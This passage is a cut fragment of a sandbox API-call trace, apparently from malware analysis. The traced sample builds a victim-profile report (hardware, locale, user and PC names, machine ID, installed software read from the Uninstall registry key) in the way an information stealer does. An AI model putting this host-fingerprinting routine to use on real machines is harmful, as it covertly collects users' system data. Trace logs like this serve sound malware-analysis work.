12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component " [0208.111] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component ", lpString2="16.0.4266.1003" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003" [0208.111] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\n" [0208.112] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.112] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x1e, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{9BE518E6-ECC6-35A9-88E4-87755C07200F}", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.112] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{9BE518E6-ECC6-35A9-88E4-87755C07200F}") returned 94 [0208.112] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{9BE518E6-ECC6-35A9-88E4-87755C07200F}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.112] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161", lpcbData=0x19ce18*=0x3f) returned 0x0 [0208.112] lstrlenA (lpString="Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161") returned 62 [0208.112] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\n", lpString2="Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161" [0208.112] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="9.0.30729.6161", lpcbData=0x19ce18*=0xf) returned 0x0 [0208.112] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 " [0208.113] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 ", lpString2="9.0.30729.6161" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161" [0208.113] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 